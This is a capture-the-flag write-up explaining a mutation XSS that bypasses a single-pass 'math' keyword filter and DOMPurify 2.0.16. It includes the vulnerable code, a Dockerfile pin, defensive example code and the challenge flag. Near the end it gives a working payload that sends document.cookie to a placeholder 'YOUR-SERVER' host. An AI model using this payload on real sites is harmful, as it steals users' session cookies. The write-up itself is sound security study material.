The search handler is vulnerable to mXSS: it tries to filter out the word **math** before sanitizing. Vulnerable code:
```javascript
// Imports as installed by the challenge's Dockerfile (dompurify + jsdom);
// the handler itself only references the DOMPurify global.
const { JSDOM } = require("jsdom");
const createDOMPurify = require("dompurify");
const DOMPurify = createDOMPurify(new JSDOM("").window);

function secureQuery(string) {
  // let's do this real quick, friends are waiting for me at the Drunken Bathrobe
  const reg = /math/gi; // nobody likes math
  // single-pass removal: stripping one occurrence can leave a new one behind
  let res = string.replaceAll(reg, "");
  res = DOMPurify.sanitize(res);
  return res;
}
```
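Why the keyword strip is not a filter, as an added example (not code from the challenge or the writeup): removing a substring can assemble a fresh copy of that substring from the characters around it, so a single `replaceAll` pass is trivially defeated, while iterating to a fixpoint at least closes that particular hole. DOMPurify is deliberately left out so this runs in plain Node; `stripOnce`, `stripToFixpoint` and `containsBlocked` are names chosen here.

```javascript
// Added example: single-pass keyword removal versus removal to a fixpoint.
// Not part of the challenge source; DOMPurify omitted so it runs without jsdom.
const BLOCKED = /math/gi;

// The challenge's approach: one replaceAll pass over the input.
function stripOnce(input) {
  return input.replaceAll(BLOCKED, "");
}

// Removing the token can *create* a new occurrence from its neighbours
// ("ma" + "MATH" + "th" -> "math"). Repeat until nothing changes, with a
// round limit so adversarial input cannot keep the loop spinning.
function stripToFixpoint(input, maxRounds = 32) {
  let prev = input;
  for (let i = 0; i < maxRounds; i++) {
    const next = prev.replaceAll(BLOCKED, "");
    if (next === prev) return next;
    prev = next;
  }
  throw new Error("filter did not converge within " + maxRounds + " rounds");
}

// Does the filtered output still contain the blocked token?
function containsBlocked(s) {
  return /math/i.test(s);
}

// Constructed inputs: a plain occurrence and two nested ones.
function demo() {
  const samples = [
    "<math><mtext>x</mtext></math>", // plain occurrence, both variants remove it
    "<maMATHth>",                    // reassembles into <math> after one pass
    "<mamaMATHthth>",                // two levels of nesting, needs three passes
  ];
  return samples.map((s) => ({
    input: s,
    once: stripOnce(s),
    fixpoint: stripToFixpoint(s),
    onceLeaks: containsBlocked(stripOnce(s)),
    fixpointLeaks: containsBlocked(stripToFixpoint(s)),
  }));
}
```

Running `demo()` shows `<maMATHth>` surviving `stripOnce` as `<math>` while `stripToFixpoint` reduces it to `<>`. That only addresses the string trick, though: the real fix on this page is the DOMPurify upgrade, and any blocklist applied before or after a sanitizer is a second parser layered on the first, which is exactly the kind of mismatch mXSS exploits. Post-processing sanitizer output (or pre-processing its input with string edits) should be avoided rather than patched.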
The result then goes through DOMPurify, whose version is pinned in the Dockerfile:
```dockerfile
RUN npm i ejs @fastify/view @fastify/formbody @fastify/static dompurify@2.0.16 jsdom
```
DOMPurify 2.0.16 is vulnerable; the fix is in the change from v2.0.16 to v2.0.17:
https://github.com/cure53/DOMPurify/compare/2.0.16...2.0.17#diff-f44bc3a1bfaa31000b8f4f1359dba82a
The test case added alongside that fix:
```json
"title": "Tests against nesting-based mXSS behavior 2/2",
"payload": "<math><mtext><table><mglyph><style><math>CLICKME</math>",
```
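Since the fix on this page is a dependency bump, here is an added example (not from the challenge or DOMPurify) of the check a reviewer can run over an install line: pull `name@version` tokens out of the `npm i` command and flag any pinned DOMPurify older than 2.0.17, the first fixed release per the compare link above. The install line is copied from the writeup's Dockerfile; `parseInstallLine`, `compareSemver` and `findOutdated` are names chosen here.

```javascript
// Added example: flag a pinned DOMPurify below the first fixed release.
// Not part of the challenge; FIXED_IN comes from the compare link on this page.
const FIXED_IN = { dompurify: "2.0.17" };

// Parse "pkg", "@scope/pkg" and "pkg@1.2.3" tokens out of an `npm i ...` line.
// Unpinned packages get version null.
function parseInstallLine(line) {
  const args = line.replace(/^\s*RUN\s+npm\s+i(nstall)?\s+/, "").trim();
  return args.split(/\s+/).map((tok) => {
    const at = tok.lastIndexOf("@");
    if (at <= 0) return { name: tok, version: null }; // "@scope/pkg" or "pkg"
    return { name: tok.slice(0, at), version: tok.slice(at + 1) };
  });
}

// Numeric MAJOR.MINOR.PATCH comparison; pre-release suffixes are ignored.
function compareSemver(a, b) {
  const pa = a.split("-")[0].split(".").map(Number);
  const pb = b.split("-")[0].split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return Math.sign(d);
  }
  return 0;
}

// Report every package with a known fixed version: "vulnerable", "fixed" or
// "unpinned" (an unpinned install resolves to whatever the registry has at
// build time, so it cannot be judged from the Dockerfile alone).
function findOutdated(line, fixedIn = FIXED_IN) {
  return parseInstallLine(line)
    .filter((p) => p.name in fixedIn)
    .map((p) => ({
      name: p.name,
      pinned: p.version,
      fixedIn: fixedIn[p.name],
      status:
        p.version === null
          ? "unpinned"
          : compareSemver(p.version, fixedIn[p.name]) < 0
          ? "vulnerable"
          : "fixed",
    }));
}

// The install line from the writeup's Dockerfile.
const INSTALL_LINE =
  "RUN npm i ejs @fastify/view @fastify/formbody @fastify/static dompurify@2.0.16 jsdom";
```

`findOutdated(INSTALL_LINE)` reports `dompurify` pinned at `2.0.16` as `vulnerable`; the same check on a lockfile is what `npm audit` automates, but a one-off over the Dockerfile catches pins that never reach a lockfile.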
mXSS reading, specifically on DOMPurify:
- https://portswigger.net/daily-swig/dompurify-mutation-xss-bypass-achieved-through-mathml-namespace-confusion
- https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/
Tools to test with:
- https://livedom.lab.xss.academy/
Code for the backend check (the bot that visits the reported URL carrying the flag cookie):
```javascript
const puppeteer = require("puppeteer");
// browser_options is defined elsewhere in the challenge source (not shown here).

// The flag is set as a plain cookie: no httpOnly, so page scripts can read it
// through document.cookie.
const cookies = [
  {
    name: "flag",
    value: process.env.FLAG,
  },
];

async function checkReport(query) {
  const browser = await puppeteer.launch(browser_options);
  try {
    const page = await browser.newPage();
    // query is concatenated into the URL as-is, without encoding
    const urlToVisit = "http://127.0.0.1:1337/search?query=" + query;
    console.log("URL to visit:", urlToVisit);
    // visit the origin first so the cookie can be attached to it
    await page.goto("http://127.0.0.1:1337/");
    await page.setCookie(...cookies);
    await page.goto(urlToVisit, {
      waitUntil: "networkidle0",
      timeout: 10000,
    });
    await browser.close();
  } catch {
    await browser.close();
  }
}
```
Final payload that evades the **math** filter and executes a callback to our server with the flag
```html
<maMATHth><mtext><table><mglyph><style><maMATHth><img src=x onerror=document.location='http://YOUR-SERVER/?c='%2bdocument.cookie;></mMATHath>
```
![[Pasted image 20221211011536.png]]
Flag:
```flag
hctf{my_n3w_flag-fl4vor3d_c0ck7ail}
```
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #hackappatoi2022 #xss #mxss #dompurify #web
Related: